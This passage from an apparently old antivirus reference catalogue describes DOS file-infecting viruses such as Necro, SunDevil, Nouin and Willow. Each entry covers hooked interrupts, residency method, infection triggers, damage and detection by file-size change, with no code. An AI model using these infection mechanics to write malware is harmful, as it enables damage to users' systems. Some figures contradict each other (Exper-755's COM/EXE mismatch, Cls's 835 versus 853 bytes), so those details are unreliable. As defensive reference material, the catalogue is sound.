  7140. [Necro]
  7141. Virus Name: Necro
  7142. Virus Type: Parasitic Virus.
  7143. Virus Length:  Infected COM and EXE file sizes increase by 696
  7144.                bytes.
  7145.  
  7146. PC Vectors Hooked:  None.
  7147.  
  7148. Executing Procedure:
  7149. 1) Searches for an uninfected COM/EXE file.
  7150. 2) Checks if the file has been infected.  If yes, continues to
  7151.    search.
  7152. 3) If an uninfected file is found, infects it (infects three
  7153.    files each time).
  7154.  
  7155. Damage:  None.
  7156.  
  7157. Detecting Method:  Detectable if  the files increase by 696 bytes
  7158.  
  7159. Remarks:
  7160. 1) The infecting part was badly written, so most of the infected
  7161.    files can not be run (Not able to infect and damage).
  7162. 2) Non memory  resident.
  7163. 3) Before infecting files, the virus does not hook INT 24h.
  7164.    Error message will appear when I/O errors occur.
  7165.  
  7166. [Eagl-7705]
  7167. Virus Name: Eagl-7705
  7168. Virus Type: Parasitic Virus
  7169. Virus Length:  7705 bytes
  7170.  
  7171. Executing Procedure:
  7172. 1) Searches for an EXE file in the  current directory.
  7173. 2) Then creates a COM file with a length of 7705 bytes. The
  7174.    contents of the COM file is the virus itself (hidden file).
  7175. 3) Repeats procedure until all the EXE files in the current
  7176.    directory are infected.
  7177.  
  7178. Damage:  None
  7179.  
  7180. Detecting Method:  Detectable if the lengths of files are 7705
  7181. Bytes.
  7182.  
  7183. Remarks:  Non memory resident.
  7184.  
  7185. [Eno-2430]
  7186. Virus Name: Eno-2430
  7187. Virus Type: Parasitic Virus.
  7188. Virus Length:  Infected COM and EXE file sizes increase by 2430-
  7189.                2445 bytes.
  7190.  
  7191. PC Vectors Hooked:  INT 21h and INT24h.
  7192.  
  7193. Executing Procedure:
  7194. 1) Checks if it resides in memory. If not, hooks INT 21h,
  7195.    installs itself as memory resident and then executes the host
  7196.    program.
  7197. 2) If it already resides in memory, executes the host program
  7198.    directly.
  7199.  
  7200. Infecting Procedure:
  7201. 1) The virus infects files by AH=4B in INT 21h. When an
  7202.    uninfected program is executed, it becomes infected.
  7203. 2) Before infecting files, Eno-2430 will hook INT 24h first to
  7204.    ignore I/O errors.
  7205.  
  7206. Damage:  The virus has a counter; after infecting a file, it
  7207. subtracts 1 from the counter. When the counter=0,   the virus
  7208. will destroy all the data on hard disk.
  7209.  
  7210. Detecting Method:  Detectable if the files increase by 2430-2445
  7211. bytes.
  7212.  
  7213. [Exper-755]
  7214. Virus Name: Exper-755
  7215. Virus Type: Parasitic Virus
  7216. Virus Length:  Infected EXE file sizes increase by 755 bytes
  7217.                (Does not infect COM files).
  7218.  
  7219. PC Vectors Hooked:  INT 24h
  7220.  
  7221. Executing Procedure:
  7222. 1) Searches for an EXE file in the current directory.
  7223. 2) Checks if the file is infected. If yes, continues to search.
  7224. 3) If an uninfected file is found, proceeds to infect it. Does
  7225.    not stop searching until all the COM files in the directory
  7226.    are infected.
  7227.  
  7228. Damage:  None
  7229.  
  7230. Detecting Method:  Detectable if the files increase by 755 bytes.
  7231.  
  7232. Remarks:
  7233. 1) Non memory resident.
  7234. 2) Before infecting, the virus hooks INT 24h first to ignore I/O
  7235.    errors.
  7236.  
  7237. [Findm-695]
  7238. Virus Name: Findm-695
  7239. Virus Type: Parasitic Virus
  7240. Virus Length:  Infected COM file sizes increase by 695-710 bytes
  7241.                (Does not infect EXE files).
  7242.  
  7243. PC Vectors Hooked:  None
  7244.  
  7245. Executing Procedure:
  7246. 1) Searches for a COM file in the current directory.
  7247. 2) Checks if the file is infected. If yes, continues to search.
  7248. 3) If an uninfected file is found, proceeds to infect it.
  7249.  
  7250. Damage:  None
  7251.  
  7252. Detecting Method:  Detectable if the files increase by 695-710
  7253. bytes.
  7254.  
  7255. Remarks:
  7256. 1) The infecting part of the virus was badly written.  Most of
  7257.    the infected files can not be executed normally (The virus is
  7258.    not  able to infect and damage).
  7259. 2) Non memory resident.
  7260. 3) When infecting files, the virus does not hook INT 24h.  Error
  7261.    message will appear when I/O errors occur.
  7262.  
  7263. [FR-1013]
  7264. Virus Name: FR-1013
  7265. Virus Type: Parasitic Virus.
  7266. Virus Length:  Infected EXE and COM file sizes increase by 1013 -
  7267.                1028 bytes.
  7268.  
  7269. PC Vectors Hooked:  INT 21h
  7270.  
  7271. Executing Procedure:
  7272. 1) Checks if it resides in memory. If not, hooks INT 21h,
  7273.    installs itself as memory resident and   then executes the
  7274.    host program.
  7275. 2) If itself already resides in memory, proceeds to execute the
  7276.    host program directly.
  7277.  
  7278. Infecting Procedure:
  7279. 1) The virus infects files by AH=4B in INT 21h. When an
  7280.    uninfected program is executed, it becomes infected.
  7281. 2) When infecting files, the virus does not hook INT 24h. Error
  7282.    message will appear when I/O errors occur.
  7283.  
  7284. Damage:  None
  7285.  
  7286. Detecting Method:  Detectable if the files increase by 1013-1028
  7287. bytes.
  7288.  
  7289. [Harm-1082]
  7290. Virus Name: Harm-1082
  7291. Virus Type: Parasitic Virus.
  7292. Virus Length:  Infected COM file sizes increase by 1082 - 1097
  7293.                bytes (Does not infect EXE files).
  7294.  
  7295. PC Vectors Hooked:  INT 21h
  7296.  
  7297. Executing Procedure:
  7298. 1) Checks if it resides in memory.  If not, it hooks INT 21h,
  7299.    installs itself as memory resident and then executes the host
  7300.    program.
  7301. 2) If it already resides in memory, it proceeds to execute the host
  7302.    program directly.
  7303.  
  7304. Infecting Procedure: The virus infects files by AH=4B in INT 21h.
  7305. When an uninfected program is executed, it becomes infected.
  7306.  
  7307. Damage:  None
  7308.  
  7309. Detecting Method:  Detectable if the files increase by 1082-1097
  7310. bytes.
  7311.  
  7312. [Hor-2248]
  7313. Virus Name: Hor-2248
  7314. Virus Type: Parasitic Virus.
  7315. Virus Length:  Infected EXE and COM file sizes increase by 2248
  7316.                bytes.
  7317.  
  7318. PC Vectors Hooked:  INT 21h and INT 24h
  7319.  
  7320. Executing Procedure: (The virus cannot run in DOS 5.0)
  7321. 1) Checks if it resides in memory. If not, it hooks INT 21h, installs
  7322.    itself as memory resident and then executes the host program.
  7323. 2) If it already resides in memory, it proceeds  to execute the host
  7324.    program directly.
  7325.  
  7326. Infecting Procedure:
  7327. 1) The virus infects files by AH=4B in INT 21h. When an
  7328.    uninfected program is executed, it becomes infected.
  7329. 2) Before infecting, the virus hooks INT 24h first to ignore I/O
  7330.    errors.
  7331.  
  7332. Damage: None
  7333.  
  7334. Detecting Method:  Detectable if the files increase by 2248
  7335. bytes.
  7336.  
  7337. [Encroach2]
  7338. Virus Name: Encroach2
  7339. Virus Type: Parasitic Virus.
  7340.  
  7341. PC Vectors Hooked:  INT 24h
  7342.  
  7343. Executing Procedure:
  7344. 1) Searches for a COM file in the  current directory.
  7345. 2) Checks if the file is infected.  If yes, it continues to search.
  7346. 3) If an uninfected file is found, proceeds to infect it (infects
  7347.    only one file each time) .
  7348.  
  7349. Damage:  None
  7350.  
  7351. Remarks:
  7352. 1) Non memory resident.
  7353. 2) Before infecting, the virus will hook INT 24h first to ignore
  7354.    I/O errors.
  7355.  
  7356. [Encroach]
  7357. Virus Name: Encroach
  7358. Virus Type: Parasitic Virus.
  7359.  
  7360. PC Vectors Hooked:  INT 24h
  7361. Executing Procedure:
  7362. 1) Searches for a COM file in the current directory.
  7363. 2) Checks if the file is infected. If yes, it continues to search.
  7364. 3) If an uninfected file is found, proceeds to infect it (infects
  7365.    only one file each time) .
  7366.  
  7367. Damage:  None
  7368.  
  7369. Remarks:
  7370. 1) Non memory resident.
  7371. 2) Before infecting, the virus will hook INT 24h first to ignore
  7372.    I/O errors.
  7373.  
  7374. [DWI]
  7375. Virus Name: Dwi
  7376. Virus Type: Parasitic Virus.
  7377. Virus Length:  Infected EXE file sizes increase by 1050-1070
  7378.                bytes (Does not infect COM files).
  7379.  
  7380. PC Vectors Hooked:  INT 21h and INT 24h
  7381.  
  7382. Executing Procedure:
  7383. 1) Checks if it resides in memory.  If not, it hooks INT 21h,
  7384.    installs itself as memory resident and proceeds to execute the
  7385.    host program.
  7386. 2) If it already resides in memory, it proceeds to execute the host
  7387.    program directly.
  7388.  
  7389. Infecting Procedure:
  7390. 1) The virus infects files by AH=4B in INT 21h. When an
  7391.    uninfected program is executed, it becomes infected.
  7392. 2) Before infecting, the virus will hook INT 24h first to ignore
  7393.    I/O   errors.
  7394.  
  7395. Damage: None
  7396.  
  7397. Detecting Method:  Detectable if the files increase by 1050-1070
  7398. bytes.
  7399.  
  7400. [Dennis]
  7401. Virus Name: Dennis (Has at least two variations)
  7402. Virus Type: Parasitic Virus.
  7403. PC Vectors Hooked:  INT 21h
  7404.  
  7405. Executing Procedure:
  7406. 1) Checks if it resides in memory.  If not, it hooks  INT 21h,
  7407.    installs itself as memory resident and then executes the
  7408.    host program.
  7409. 2) If it already resides in memory, it proceeds to execute the host
  7410.    program directly.
  7411.  
  7412. Infecting Procedure:
  7413. 1) The virus infects files by AH=4B in INT 21h. When an
  7414.    uninfected program is executed, it becomes infected.
  7415. 2) When infecting files, Dennis does not hook INT 24h. Error
  7416.    message will appear when I/O errors occur.
  7417.  
  7418. Damage:  None
  7419.  
  7420. [Comsysexe]
  7421. Virus Name: Comsysexe (There are several variations)
  7422. Virus Type: Parasitic Virus.
  7423.  
  7424. PC Vectors Hooked:  INT 21h
  7425.  
  7426. Executing Procedure:
  7427. 1) Check if it resides in memory.  If not, it hooks
  7428.    INT 21h, installs itself as memory resident and
  7429.    then executes the host program.
  7430. 2) If it already resides in memory, it proceeds to
  7431.    execute the host program directly.
  7432. Infecting Procedure:
  7433. 1) The virus infects files by AH=4B in INT 21h.
  7434.    When an uninfected program is executed, it
  7435.    becomes infected. (infect EXE, COM and SYS
  7436.    files)
  7437. 2) When infecting files, Comsysexe does not hook
  7438.    INT 24h.  Error message will appear when I/O
  7439.    errors occur.
  7440. Damage:  None
  7441.  
  7442. [Cruncher]
  7443. Virus Name: Cruncher
  7444. Virus Type: Parasitic Virus.
  7445. PC Vectors Hooked:  INT 21h and INT 24h
  7446. Executing Procedure:
  7447. 1) Check if it resides in memory.  If not, it hooks INT 21h,
  7448.    installs itself as memory resident and then executes the host
  7449.    program.
  7450. 2) If it already resides in memory, it proceeds to execute the host
  7451.    program directly.
  7452.  
  7453. Infecting Procedure:
  7454. 1) The virus infects files by AH=4B in INT 21h. When an
  7455.    uninfected program is executed, it becomes infected.
  7456. 2) Before infecting files, the virus will hook INT 24h first to
  7457.    ignore I/O errors.
  7458.  
  7459. Damage:  None
  7460.  
  7461. [Ice-159]
  7462. Virus Name: Ice-159
  7463. Virus Type: Parasitic Virus.
  7464. Virus Length:  Infected COM file sizes increase by 159 bytes
  7465.                (Does not infect EXE files).
  7466.  
  7467. PC Vectors Hooked:  None
  7468.  
  7469. Executing Procedure:
  7470. 1) Searches for a COM file in the current directory.
  7471. 2) Checks if the file is infected. If yes, it continues to search.
  7472. 3) If an uninfected file is found, it proceeds to infect it (infects
  7473.    only one file each time).
  7474.  
  7475. Damage:  None
  7476.  
  7477. Detecting Method:  Detectable if the files increase by 159 bytes.
  7478.  
  7479. Remarks:
  7480. 1) Non memory resident.
  7481. 2) When infecting files, the virus does not hook INT 24h.  Error
  7482.    messages will appear when I/O errors occur.
  7483.  
  7484. [Joker3]
  7485. Virus Name: Joker3
  7486. Virus Type: Parasitic Virus.
  7487. Virus Length:  Infected COM file sizes increase by 1084 bytes
  7488.                (Does not infect EXE files).
  7489.  
  7490. PC Vectors Hooked:  INT 21h
  7491.  
  7492. Executing Procedure:
  7493. 1) Checks if it resides in memory.  If not, it hooks INT 21h,
  7494.    installs itself as memory resident and then executes the host
  7495.    program.
  7496. 2) If it already resides in memory, it proceeds to execute the host
  7497.    program directly.
  7498.  
  7499. Infecting Procedure: The virus infects files by INT 21h.  When
  7500. INT 21h is executed, all the COM files in the current directory
  7501. will be infected.  When infecting files, the virus does not hook
  7502. INT 24h.  Error message will appear when I/O errors occur.
  7503.  
  7504. Damage:  None
  7505.  
  7506. Detecting Method:  Detectable if  the files increase by 1084
  7507. bytes.
  7508.  
  7509. [Mi-Nazi]
  7510. Virus Name: Mi-Nazi
  7511. Virus Type: Parasitic Virus.
  7512.  
  7513. Virus Length:  Infected COM file sizes increase by 1084 bytes
  7514.                (Does not infect EXE files).
  7515.  
  7516. PC Vectors Hooked:  INT 21h
  7517.  
  7518. Executing Procedure:
  7519. 1) Searches for a COM file in the current directory.
  7520. 2) Checks if the file is infected. If yes, it continues to search.
  7521. 3) If an uninfected file is found, it proceeds to infect it
  7522.    (infects only one file each time).
  7523.  
  7524. Damage: The part for virus infection was badly written. The
  7525. infected files cannot be executed normally (Furthermore, the
  7526. virus is not able to infect and damage).
  7527.  
  7528. Remarks:
  7529. 1) The virus infects files by INT 21h. When INT 21h is executed,
  7530.    all   the COM files in the current directory will be infected.
  7531. 2) When infecting files, the virus does not hook INT 24h.  Error
  7532.    message will appear when I/O errors occur.
  7533.  
  7534. [Tiny-143]
  7535. Virus Name: Tiny-143
  7536. Virus Type: Memory Resident (OS), COM File infector
  7537. Virus Length:  143 bytes
  7538.  
  7539. Executing Procedure: Checks whether it is residing in memory. If
  7540. not, it will copy itself to absolute address 0060:0000h. Then
  7541. hooks INT21h and goes back to the original routine.
  7542.  
  7543. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. If the
  7544. program to be executed is an uninfected COM file, the virus proceeds
  7545. to infect it.
  7546.  
  7547. Damage: None
  7548.  
  7549. Detecting Method:
  7550. 1) Date and time of infected files are changed.
  7551. 2) Infected file sizes increase by 143 bytes.
  7552.  
  7553. [Smal-122B]
  7554. Virus Name: Smal-122B
  7555. Virus Type: Memory Resident(OS), COM & EXE File infector
  7556. Virus Length:  122 bytes
  7557.  
  7558. Executing Procedure: Checks whether it resides in memory. If not,
  7559. the virus copies itself to absolute address 0000:0103h. Then hooks
  7560. INT21h and goes back to the original routine. Vectors hooked:
  7561. Hooks INT 21h (AX=4B00h) to infect files. If the program to be
  7562. executed is an uninfected COM or EXE file and its first byte is
  7563. not E9h, the virus proceeds to infect it.
  7564.  
  7565. Damage: EXE files are destroyed because of the subsequent head
  7566. damaged.
  7567.  
  7568. Note: Some interrupts cannot run correctly because the virus has
  7569. stayed resident in vector area.
  7570.  
  7571. Detecting Method:
  7572. 1) Date and time of infected files changed.
  7573. 2) Infected file sizes increase by 122 bytes.
  7574.  
  7575. [Printmon]
  7576. Virus Name: Printmon
  7577. Virus Type: COM File infector
  7578. Virus Length: 853 bytes
  7579.  
  7580. Executing Procedure: Checks whether it has hooked INT 17h. If
  7581. not, virus makes some procedure of INT 17h to stay resident in
  7582. memory. Then proceeds to infect all uninfected COM files with
  7583. length less than 64000 bytes on current directory and goes back
  7584. to the original routine (During infecting period, it hangs INT
  7585. 24h to prevent divulging its trace when writing).
  7586.  
  7587. Vectors hooked: Hooks INT 17h (Printing Function) to change
  7588. printing data.
  7589.  
  7590. Damage: It will make some mistakes in printing.
  7591.  
  7592. Note:  Date and time of infected files do not change.
  7593.  
  7594. Detecting Method: Infected file sizes will increase by 853 bytes.
  7595.  
  7596. [Tiny-124]
  7597. Virus Name: Tiny-124
  7598. Virus Type: Memory Resident(OS), COM File infector
  7599. Virus Length:  124 bytes
  7600.  
  7601. Executing Procedure: Checks whether it resides in memory. If not,
  7602. the virus copies itself to absolute address 0050:0103h. Then hooks
  7603. INT21h and goes back to the original routine.
  7604.  
  7605. Vectors hooked: Hooks INT 21H(AX=4B00h) to infect files. If the
  7606. program to be executed is an uninfected COM file and its first
  7607. byte is not E9h, virus proceeds to infect it.
  7608.  
  7609. Damage: EXE files are destroyed because of  the subsequent head
  7610. damaged.
  7611.  
  7612. Note: Some interrupts cannot run correctly because virus has
  7613. stayed resident in vector area.
  7614.  
  7615. Detecting Method:
  7616. 1) Date and time of infected files changed.
  7617. 2) Infected file sizes increase by 124 bytes.
  7618.  
  7619. [Smal-124]
  7620. Virus Name: Smal-124
  7621. Virus Type: Memory Resident(OS), COM File infector
  7622. Virus Length: 124 bytes
  7623.  
  7624. Executing Procedure: Checks whether it is residing in memory. If
  7625. not, it copies itself to absolute address  0050:0103h. Then hooks
  7626. INT21h and goes back to the original routine.
  7627.  
  7628. Vectors hooked: Hooks INT 21H(AX=4B00h) to infect files. If the
  7629. program to be executed is an uninfected COM file, virus proceeds
  7630. to infect it.
  7631.  
  7632. Damage: None
  7633.  
  7634. Note: Some interrupts cannot run correctly because the virus has
  7635. stayed resident in vector area.
  7636.  
  7637. Detecting Method:
  7638. 1) Date and time of infected files changed.
  7639. 2) Infected file sizes increase by 124 bytes.
  7640.  
  7641. [Troi2]
  7642. Virus Name: Troi2
  7643. Virus Type: Memory Resident(OS), EXE File infector
  7644. Virus Length:  512 bytes
  7645.  
  7646. Executing Procedure: Checks whether the current date is before
  7647. 5/1/1992. If it is, it returns to the original routine directly.
  7648. Otherwise, checks whether it is residing in memory. If not, virus
  7649. copies itself to absolute address 0000:0200h (The area of
  7650. interrupts vectors), hooks INT 21h and goes back to the original
  7651. routine.
  7652.  
  7653. Vectors hooked:
  7654. 1) Hooks INT 21h to check whether it is residing in memory.
  7655. 2) Hooks INT 21H (AH=4Bh) to infect files. If the program to be
  7656.    executed is an uninfected EXE file, virus proceeds to infect
  7657.    it.
  7658.  
  7659. Damage: None
  7660.  
  7661. Note: Date and time of infected files do not change.
  7662.  
  7663. Detecting Method: Infected file sizes increase by 512 bytes.
  7664.  
  7665. [Tver]
  7666. Virus Name: Tver
  7667. Virus Type: Memory Resident(OS), COM File infector
  7668. Virus Length:  308 bytes
  7669.  
  7670. Executing Procedure:
  7671. Checks whether it is residing in memory. If not, virus copies
  7672. itself to  absolute address 0000:0200h (the area of interrupt
  7673. vectors), hooks INT 21h and goes back to the original routine.
  7674.  
  7675. Vectors hooked:
  7676. 1) Hooks INT 21h to check whether it is residing in memory.
  7677. 2) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  7678.    executed is an uninfected COM file and its first byte is E9h,
  7679.    the virus proceeds to infect it.
  7680.  
  7681. Damage: None
  7682.  
  7683. Note: Many virus files' first byte is E9h. In most cases, virus
  7684. corrects files' first byte if it is not E9h.
  7685.  
  7686. Detecting Method:
  7687. 1) Date and time of infected files changed.
  7688. 2) Infected file sizes increase by 308 bytes.
  7689.  
  7690. [Wave]
  7691. Virus Name: Wave
  7692. Virus Type: Memory Resident(OS), COM File infector
  7693. Virus Length:  454 bytes
  7694.  
  7695. Executing Procedure: Checks whether it is residing in memory. If
  7696. not, virus copies itself to absolute address 0000:01ECh (the area
  7697. of interrupt vectors), hooks INT 21h and INT 1Ch, changes the
  7698. pointer of INT 78h to the address that pointed by original INT
  7699. 21h. Then goes back to the original routine.
  7700.  
  7701. Vectors hooked:
  7702. INT 21h:
  7703. 1) Hooks INT 21h to check whether it remains in memory.
  7704. 2) Hooks INT 21h (AH=4Bh,AH=3Dh) to infect files. If the program
  7705.    to be executed is an uninfected COM, and the combined length of
  7706.    program and virus is between 1500 bytes and 64000 bytes and it
  7707.    is on C drive (Except A & B drive), then the virus will proceed to
  7708.    infect. Otherwise, it will set a flag to be used by INT 1Ch at
  7709.    a later time.
  7710. INT 1Ch: Hooks INT 1Ch to shake screen from side to side for time
  7711. of 33 seconds after a flag is set by INT 21h.
  7712.  
  7713. Damage: None
  7714.  
  7715. Note: Time and date (Except year) of infected files does not
  7716. change. You cannot see the change when you use  Dir" command
  7717. because the last two bytes of data have not changed (You would
  7718. see some problems on arrangement order if you attach "/od" to
  7719. Dir" command).
  7720.  
  7721. Detecting Method: Infected file sizes will increase by 454 bytes.
  7722.  
  7723. [Zz1]
  7724. Virus Name: Zz1
  7725. Virus Type: Overwrite, COM File infector
  7726. Virus Length:  127 bytes
  7727.  
  7728. Executing Procedure: Searches for an uninfected COM file on the
  7729. current directory and infects it (Infects only one file at a
  7730. time). If there is no file to infect, it changes data in
  7731. system RAM to set screen lines to 81. This confuses the screen.
  7732.  
  7733. Damage:
  7734. 1) It overwrites first 127 bytes of original files by virus code.
  7735.    Original files are destroyed.
  7736. 2) Confuses screen if there are no infectable files.
  7737.  
  7738. Note: Date and time of infected files does not change.
  7739.  
  7740. [Willow]
  7741. Virus Name: Willow
  7742. Virus Type: Memory Resident, EXE File infector
  7743. Virus Length:  1870 bytes
  7744.  
  7745. Executing Procedure: Checks whether it has remained in the
  7746. memory. If not, hooks INT 14h first, then changes the pointer of
  7747. INT FDh to the address that is pointed by INT 21h. Then hooks INT
  7748. 21h. At last, after all memory is released, gets the name of
  7749. Shell executed by system from environment parameter. Executes
  7750. this Shell again. Terminates upon re-residing in memory.
  7751.  
  7752. Vectors hooked:
  7753. 1) Hooks INT 21h to check whether it has stay resident in memory.
  7754. 2) Hooks INT 21h(AH=4Bh) to infect files. If the program to be
  7755.    executed is a COM file, it deletes it. If it is a EXE file,
  7756.   the virus proceeds to infect it.
  7757.  
  7758. Damage: It will delete COM files executed while virus is residing
  7759. in memory.
  7760.  
  7761. Note: Date and time of infected files does
  7762.  not change.
  7763.  
  7764. Detecting Method: Infected file sizes increase by 1870-1885
  7765. bytes.
  7766.  
  7767. [V-66]
  7768. Virus Name: V-66
  7769. Virus Type: Overwrites, all-File infector
  7770. Virus Length:  66 bytes
  7771.  
  7772. Executing Procedure: Infects all files on current directory.
  7773.  
  7774. Method: changes files' attribute making them writable. Proceeds
  7775. to overwrite first 66 bytes with virus code.
  7776.  
  7777. Damage: It will overwrite original files with virus code.
  7778. Original files are destroyed.
  7779.  
  7780. Detecting Method: Date and time of infected files changed.
  7781.  
  7782. [VCL-408]
  7783. Virus Name: VCL408
  7784. Virus Type: Overwrites, EXE & COM File infector
  7785. Virus Length:  408 bytes
  7786.  
  7787. Executing Procedure: Searches for one uninfected COM or EXE file
  7788. on each directory and infects them. Virus records whether initial
  7789. infection is successful or not. Subsequent  record will overwrite
  7790. original. Last record is record of last infection. The virus checks
  7791. this record before terminating. If the record fails, the virus halts
  7792. system.
  7793.  
  7794. Damage:
  7795. 1) Files destroyed after becoming infected.
  7796. 2) Halts system on occasion.
  7797.  
  7798. Note:
  7799. 1) Date and time of infected files does not change.
  7800. 2) Length of infected files does not change unless the length of
  7801.    original files is less than 408. If so, the length of infected
  7802.    files becomes 408 bytes.
  7803.  
  7804. [SUNDEVIL]
  7805. Virus Name: SunDevil
  7806. Virus Type: COM File infector
  7807. Virus Length:  691 bytes
  7808.  
  7809. Executing Procedure: Checks whether current date is MAY 8. If it
  7810. is, it destroys the first sector  (Boot sector) on current diskette.
  7811. Then it displays a message and repeats call INT 05h. The message is:
  7812.  
  7813.     "There is no America. There is no Democracy.
  7814.      There is only IBM, ITT, and AT&T.
  7815.      This virus is dedicated to all that have been
  7816.      busted for computer-hacking activities.
  7817.      The SunDevil Virus (C) 1993 by Crypt Keepr
  7818.      [SUNDEVIL] "
  7819.  
  7820. Otherwise, virus copies itself to absolute address 9000:0000h.
  7821. Then hooks INT21h and returns to the original routine.
  7822.  
  7823. Vectors hooked: Hooks INT 21h (AH=3D,3E,56, AX=4300,4B00,4B01) to
  7824. infect files. If the program to be executed is an uninfected COM
  7825. file, the virus proceeds  to infect it.
  7826.  
  7827. Damage: It destroys the boot sector of the current diskette if current
  7828. date is MAY, 8.
  7829.  
  7830. Note: Date and time of infected files does not change.
  7831.  
  7832. Detecting Method:
  7833. 1) Infected file sizes increase by 691 bytes.
  7834. 2) Above message will manifest when you use Type command.
  7835.  
  7836. [Skew-469]
  7837. Virus Name: Skew-469
  7838. Virus Type: Memory Resident(OS), EXE File infector
  7839. Virus Length:  469 bytes
  7840.  
  7841. Executing Procedure: Checks whether it resides in memory. If not, it
  7842. copies itself to absolute address 0000:0200h, then hooks INT21h
  7843. and goes back to the original routine.
  7844.  
  7845. Vectors hooked:
  7846. 1) Hooks INT 21h (AX=4B00h or AH=3Dh) to infect files. First,
  7847.  it hangs INT 24h to prevent divulging its trace when writing.
  7848.    Then it checks whether the program to be executed is an
  7849.    uninfected EXE file. If it is, it proceeds to infect it. Finally,
  7850.  it restores INT 24h.
  7851. 2) Hooks INT 1Ch. Increases value of an address by 1 overtime
  7852.    this interrupt called. After the value equals FFFFh, virus
  7853.    writes current value to video  card making the screen move up or
  7854.    down or from side to side.
  7855.  
  7856. Damage: Causes screen to move up to down or from side to side.
  7857.  
  7858. Detecting Method:
  7859. 1) Date and time of infected files change.
  7860. 2) Infected file sizes increase by 469-469+15 bytes.
  7861.  
  7862. [Atas_400]
  7863. Virus Name: Atas_400
  7864. Virus Type: COM File infector
  7865. Virus Length:  400 bytes
  7866.  
  7867. Executing Procedure: The virus will decode first, then hang INT
  7868. 24h to prevent divulging its trace when writing, then change the
  7869. head of it. After that, search for a file on current directory to
  7870. infect (The file must be an uninfected  COM file, and its length
  7871. must be larger than 255 bytes and less than 64256 bytes). At
  7872. last, it will check system time. If current second is less than
  7873. 3, display a message as:
  7874.  
  7875.     "I like to travel ...".
  7876.  
  7877. Then restore INT 24h and go back to the original routine.
  7878.  
  7879. Vectors hooked: Hook INT 24h. Virus will Nullify the function of
  7880. dealing with severe mistakes.
  7881.  
  7882. Damage: None
  7883.  
  7884. Note:
  7885. 1) Only infect one file once a time.
  7886. 2) Date and time of infected files changed.
  7887.  
  7888. [DM-330]
  7889. Virus Name: Dm-330
  7890. Virus Type: Memory Resident, COM File infector
  7891. Virus Length:  330 bytes
  7892.  
  7893. Executing Procedure: The virus will decode first, then check
  7894. whether it has stayed resident in  memory. If not, it will move
  7895. itself to absolute address from 0000:0208h to 0000:0351h. Then
  7896. hook INT21h and go back to the original routine.
  7897.  
  7898. Vectors hooked:
  7899. 1) Hook INT 5Fh. Point to the address which pointed of original
  7900.    INT 21h
  7901. 2) Hook INT 21h to infect files. Virus aroused when system calls
  7902.    INT 21h to execute a program(AH=4Bh), change file's attribute
  7903.    (AH=43h), change file name(AH=56h), or open file(AH=3Dh). The
  7904.    virus will check whether the program to be executed is an
  7905.    uninfected COM file. If it is, infect it.
  7906.  
  7907. Damage: None
  7908.  
  7909. Note:
  7910. 1) Virus stayed in the area of interrupt vectors. This will cause
  7911.    a conflict between virus routine and interrupts vectors
  7912.    (address from 0000:0208h to 0000:0351h).
  7913. 2) Date and time of infected files do not change.
  7914.  
  7915. [CLS]
  7916. Virus Name: Cls
  7917. Virus Type: Memory Resident, COM & EXE File infector
  7918. Virus Length:  835 bytes
  7919.  
  7920. Executing Procedure: Checks whether it has stayed resident in
  7921. memory. If not, it will move itself to high memory (It will take
  7922. 70 pares). Then hook INT21h, INT 08h, INT 13h and go back to the
  7923. original routine.
  7924.  
  7925. Vectors hooked:
  7926. INT 21h:
  7927. 1) Hook INT21h to check whether it has stayed resident in memory.
  7928. 2) Hook INT21h to infect files. Virus aroused when system calls
  7929.    INT21h to execute a program (AH=4Bh). It will check whether
  7930.    the program to be executed is  an uninfected COM file and its
  7931.    length is between 129 bytes and 64512 bytes. If it is, infect
  7932.    it.
  7933. INT 08h: Hook INT 08h (Time interrupt, executed once every 1/18
  7934. second). Every time this interrupt executed, value of a counter
  7935. increase by 1. When the value is equal to 65520 (About an hour
  7936. later), it will clean screen (It has no effect on monochrome
  7937. because the cleaning method is writing 00 into the address from
  7938. B800:0000h to B800:0FA0h).
  7939. INT 13h: Hook INT 13h. This is an assistance to virus's writing.
  7940.  
  7941. Damage: It will clean screen once an hour.
  7942.  
  7943. Note: Date and time of infected files do not change.
  7944.  
  7945. Detecting Method: Infected files will increase by 853 bytes.
  7946.  
  7947. [Nouin]
  7948. Virus Name: Nouin
  7949. Virus Type: Memory Resident, COM & EXE File infector
  7950. Virus Length:  855 bytes
  7951.  
  7952. Executing Procedure: Checks whether it has stayed resident in
  7953. memory. If not, it will move itself to high memory. Then hooks
  7954. INT21h, INT 09h, INT 83h and goes back to the original routine
  7955. (This virus's staying resident method is fairly crude, it needs
  7956. the last MCB controlled by DOS in the address when loading
  7957. the executed program). Vectors hooked:
  7958. 1) Hooks INT 83h to store a word to express that the virus has stayed
  7959.    resident in memory.
  7960. 2) Hooks INT 09h to decrease a value by 1 every time you press a
  7961.    key. Set a damage_flag when the value decreased to zero.
  7962. 3) Hooks INT 21h(AH=3Dh,aH=43h,AX=4B00h). It will check whether
  7963.    the program to be executed is an uninfected EXE or COM file
  7964.    (it would skip SCAN.EXE and CLEAN.EXE). If it is a COM file,
  7965.    then it checks if the length of it is not larger than 60000. If it is,
  7966.  it will infect it. Then it checks whether the damage_flag is set. If it is,
  7967.    it checks if current date is between November 11 and 30. If it is,
  7968.  it destroys sectors from 1 to 9  on the current diskette.
  7969.  
  7970. Damage: After the virus has stayed resident  in memory, and
  7971. the the number of time the keyboard has been struck is equal to a certain value, or
  7972. the current date is between November 11 and 30, it will
  7973. destroy sectors 1 to 9 on current diskette.
  7974.  
  7975. Note: Date and time of infected files does not change.
  7976.  
  7977. Detecting Method: Infected files will increase by 855 bytes.
  7978.  
  7979. [V-550]
  7980. Virus Name: V-550
  7981. Virus Type: Memory Resident, EXE File infector
  7982. Virus Length:  550 bytes
  7983.  
  7984. Executing Procedure: The virus checks whether it has not stayed resident in
  7985. memory, and the block of memory which loads current program is
  7986. the last MCB. If it is, it will move itself to high memory, then
  7987. hook INT21h and go back to the original routine.
  7988.  
  7989. Vectors hooked:
  7990. 1) Hooks INT 21 to check whether it has stayed resident in memory.
  7991. 2) Hooks INT 21 to check whether the program to be executed is an
  7992.    uninfected  EXE file. If it is, it infects it.
  7993.  
  7994. Damage: None
  7995.  
  7996. Detecting Method:
  7997. 1) Date and time of infected files changed.
  7998. 2) Infected files will increase about 550 bytes.
  7999. 3) The total memory decreased 39 pares after virus has stayed
  8000.    resident in memory.
  8001.  
  8002. [Angarsk]
  8003. Virus Name: Angarsk
  8004. Virus Type: COM File infector
  8005. Virus Length:  238 bytes
  8006.  
